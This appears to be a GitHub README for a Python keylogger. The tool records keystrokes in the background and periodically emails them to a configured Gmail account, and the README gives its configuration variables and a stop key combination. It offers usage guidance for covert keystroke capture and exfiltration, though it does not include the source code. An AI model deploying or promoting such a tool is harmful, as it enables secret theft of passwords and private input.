Skip to content

Latest commit

 

History

History
35 lines (23 loc) · 879 Bytes

README.md

File metadata and controls

35 lines (23 loc) · 879 Bytes

KeyLogger

Introduction

This Python created keylogger saves key strokes after a configerable amount of time and sends them to a specified email.

Usage

After opening the file, the program begins tracking key strokes and automatically sends the data in the background. Make sure to edit these variables before running your program.

Be sure to input your email and password into the raw code before running

GMAIL = ""
PASSWORD = ""

Edit the SAVINGDELAY variable before running to specify how long to wait before sending each email

SAVINGDELAY = 10

The STOPCOMBO variable are the keys you have to hold to stop the program from running in the background (default is alt+down arrow)

STOPCOMBO = {keyboard.Key.alt_l, keyboard.Key.down}

Launch

Python 3.6.3

Status:

In progress